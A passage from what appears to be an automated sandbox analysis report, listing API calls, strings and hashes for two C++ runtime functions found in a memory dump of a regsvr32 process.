                                                • API ID: AddressHandleModuleProc
                                                • String ID: RtlRandomEx$ntdll.dll
                                                APIs
                                                • std::exception::exception.LIBCONCRTD ref: 7EC15868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: parse error$parse_error
                                                • API String ID: 2807920213-1820534363
                                                • Opcode ID: e24d0d372380ae654f170be4cb3d8bffa03b1254b7087d70629afb7b5953ee57
                                                • Instruction ID: eeddad0a744deb3682c1f6d290a3f8a3434fca3eae159f927d9acc9a1c860ed2
                                                • Opcode Fuzzy Hash: e24d0d372380ae654f170be4cb3d8bffa03b1254b7087d70629afb7b5953ee57
                                                • Instruction Fuzzy Hash: 09A126B8D04258DFCB18CF98C990BEEBBB1BF49300F208599D959AB345DB306A45DF90
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF7AF3
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EBF7BBF
                                                  • Part of subcall function 7EC3FEA2: _Yarn.LIBCPMT ref: 7EC3FEC1
                                                  • Part of subcall function 7EC3FEA2: _Yarn.LIBCPMT ref: 7EC3FEE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 748b82ea1289020b3f4ad15a481931bf8831831a31cd550dcf062645c17b2091
                                                • Instruction ID: 9f8aff0bfc01ec2ad397dc86d4e81e3c465f3b72e9ceadb91da2639afd9cef65
                                                • Opcode Fuzzy Hash: 748b82ea1289020b3f4ad15a481931bf8831831a31cd550dcf062645c17b2091
                                                • Instruction Fuzzy Hash: FA4106B4905289DFDB01CF98C954BAEFBF1BF49304F248599D414AB381C77A9901CBA5